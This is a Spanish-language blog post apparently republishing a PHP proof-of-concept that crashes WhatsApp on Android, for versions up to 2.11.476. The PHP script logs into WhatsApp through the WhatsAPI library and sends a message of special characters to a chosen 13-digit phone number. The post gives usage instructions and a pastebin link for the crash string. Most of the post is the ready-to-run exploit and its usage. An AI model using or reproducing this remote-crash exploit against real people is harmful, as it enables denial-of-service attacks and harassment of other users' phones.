HACKER ANGELWHITE GALC

viernes, 15 de mayo de 2015

[PHP] Crashear WhatsApp usando WhatsAPI EXPLOINT






Modo de uso de script
root@rodrix:~# php wacrash.php 549XXXXXXXXXX

Recuerden que el num de contacto que van a crashear debe ser de 13 dígitos. En la variable $msg deben copiar y pegar el contenido del pastebin que dejo en el comentario, donde se encuentran los caracteres especiales para crashear whatsapp.

Código: PHP
  1. <?php
  2.  
  3. /*
  4.  *      Title: WhatsApp Remote Crash with PHP
  5.  *      Product: WhatsApp
  6.  *      Vendor Homepage: http://www.whatsapp.com
  7.  *      Vulnerable Version(s): 2.11.476
  8.  *      Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3
  9.  *      Mirror: http://pastebin.com/Ktu45GN0
  10.  *      Date: 05/02/2015
  11.  *
  12.  *      Author Exploit:
  13.  *              Rodrigo Avila - @el_rodrix - <rodrigo398@hotmail.com>
  14.  *      Credits:
  15.  *              Daniel Godoy - @0xhielasangre - <danielgodoy@gobiernofederal.com>
  16.  *              Gonza Cabrera - @Gonnza_Cabrera - <gonnza.cabrera@gmail.com>
  17.  *
  18.  *      Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
  19.  *                  http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/
  20.  *                 http://www.exploit-db.com/exploits/35637/
  21.  *                 http://www.exploit-db.com/exploits/32865/
  22.  *
  23.  *      Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
  24.  *      It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even
  25.  *      engaging in an interactive conversation over WhatsApp protocol
  26.  */
  27.  
  28. require 'src/whatsprot.class.php';
  29.  
  30. function fgets_u($pStdn)
  31. {
  32.     $pArr = array($pStdn);
  33.  
  34.     if (false === ($num_changed_streams = stream_select($pArr, $write = NULL, $except = NULL, 0))) {
  35.         print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n");
  36.  
  37.         return FALSE;
  38.     } elseif ($num_changed_streams > 0) {
  39.         return trim(fgets($pStdn, 1024));
  40.     }
  41.     return null;
  42. }
  43. $nickname = "RemoteExecution";
  44. $sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00)
  45. $imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc)
  46. $password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp
  47. $msg = "RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd
  48. $usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n";
  49.  
  50. if ($argc < 2) {
  51.     echo $usage;
  52.     exit(1);
  53. }
  54.  
  55. if (is_numeric($_SERVER['argv'][1])){
  56.         if (strlen($_SERVER['argv'][1]) == 13){
  57.                 $dst = $_SERVER['argv'][1];
  58.                 echo "[] Logging in as '$nickname' ($sender)\n";
  59.                 $wa = new WhatsProt($sender, $imei, $nickname, false);
  60.  
  61.                 $wa->connect();
  62.                 $wa->loginWithPassword($password);
  63.  
  64.                 echo "\n[] Send message to $dst: $msg\n";
  65.                 $wa->sendMessage($dst , $msg);
  66.                 echo "\n";
  67.                 exit(0);
  68.         }else{
  69.                 echo $usage;
  70.         }
  71. }else{
  72.         echo $usage;
  73. }
  74.  

Adjunto screenshot del momento que crashea el app de whatsapp en Android. Para esta PoC se utilizo un Samsung Galaxy S4, con WhatsApp+ v6.65.

Información del dispositivo:



WhatsApp+ crashea:



WhatsApp+ crashea:



Información de WhatsApp app:

SHARE ON:

No hay comentarios:

Publicar un comentario